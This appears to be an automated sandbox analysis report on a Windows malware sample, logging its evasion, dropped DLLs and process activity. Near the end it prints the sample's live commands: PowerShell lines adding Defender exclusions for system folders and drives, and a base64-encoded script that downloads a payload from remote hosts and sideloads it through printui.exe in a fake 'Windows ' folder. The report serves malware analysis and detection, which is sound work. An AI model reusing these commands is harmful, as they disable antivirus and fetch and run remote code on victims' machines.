          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5061Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4774Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6618Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3027Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6575Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3150Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6281Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3351Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3579
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1765
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7412
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2074
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7423
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2154
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7609
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1988
          Source: C:\Windows\System32\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_28-117406
          Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\pyld.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dllJump to dropped file
          Source: C:\Windows\System32\svchost.exeAPI coverage: 1.2 %
          Source: C:\Windows\System32\console_zero.exeAPI coverage: 1.5 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep count: 5061 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep count: 4774 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600Thread sleep time: -17524406870024063s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep count: 6618 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 3027 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep count: 6575 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960Thread sleep count: 3150 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1560Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 3836Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648Thread sleep count: 6281 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep count: 3351 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\System32\console_zero.exe TID: 2472Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684Thread sleep count: 3579 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128Thread sleep count: 1765 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5240Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep count: 7412 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 2074 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\console_zero.exe TID: 6360Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 7423 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep count: 2154 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep count: 7609 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep count: 1988 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4832Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\timeout.exe TID: 6608Thread sleep count: 116 > 30
          Source: C:\Windows\System32\timeout.exe TID: 2824Thread sleep count: 143 > 30
          Source: C:\Users\user\Desktop\app64.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h28_2_64946F50
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74713C568 FindClose,FindFirstFileExW,GetLastError,34_2_00007FF74713C568
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74713C5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,34_2_00007FF74713C5DC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000003.00000002.2256489419.000002713D208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}_
          Source: powershell.exe, 00000003.00000002.2256489419.000002713D208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
          Source: powershell.exe, 00000003.00000002.2256489419.000002713D1A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3268859281.000001D8E782B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2620974839.000001801B68B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\app64.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_649461C0 IsDebuggerPresent,RaiseException,28_2_649461C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83AFC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,28_2_00007FF8B83AFC30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF111180 Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,malloc,strlen,malloc,memcpy,_initterm,0_2_00007FF7DF111180
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF11B2E0 SetUnhandledExceptionFilter,0_2_00007FF7DF11B2E0
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF115349 SetUnhandledExceptionFilter,0_2_00007FF7DF115349
          Source: C:\Windows \System32\printui.exeCode function: 10_2_00007FF67A0E1B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF67A0E1B5C
          Source: C:\Windows \System32\printui.exeCode function: 10_2_00007FF67A0E1880 SetUnhandledExceptionFilter,10_2_00007FF67A0E1880
          Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF67A0E1B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF67A0E1B5C
          Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF67A0E1880 SetUnhandledExceptionFilter,13_2_00007FF67A0E1880
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_64947650
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,28_2_6828C940
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7FA0C08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8A7FA0C08
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F92CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8A7F92CA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935EE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8A935EE70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935FA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8A935FA50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83C9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8B83C9E30
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74713DE40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF74713DE40
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74714AE5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF74714AE5C
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83C9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF8B83C9E30
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83CA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF8B83CA8B4

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: amsi64_2124.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_6620.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_2124.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
          Source: C:\Users\user\Desktop\app64.exeNtCreateUserProcess: Direct from: 0x7FF7DF113E4FJump to behavior
          Source: C:\Users\user\Desktop\app64.exeNtQuerySystemInformation: Direct from: 0x7FF7DF113E73Jump to behavior
          Source: C:\Users\user\Desktop\app64.exeNtClose: Direct from: 0x7FF7DF113E43
          Source: C:\Users\user\Desktop\app64.exeNtDelayExecution: Direct from: 0x7FF7DF113E67Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"Jump to behavior
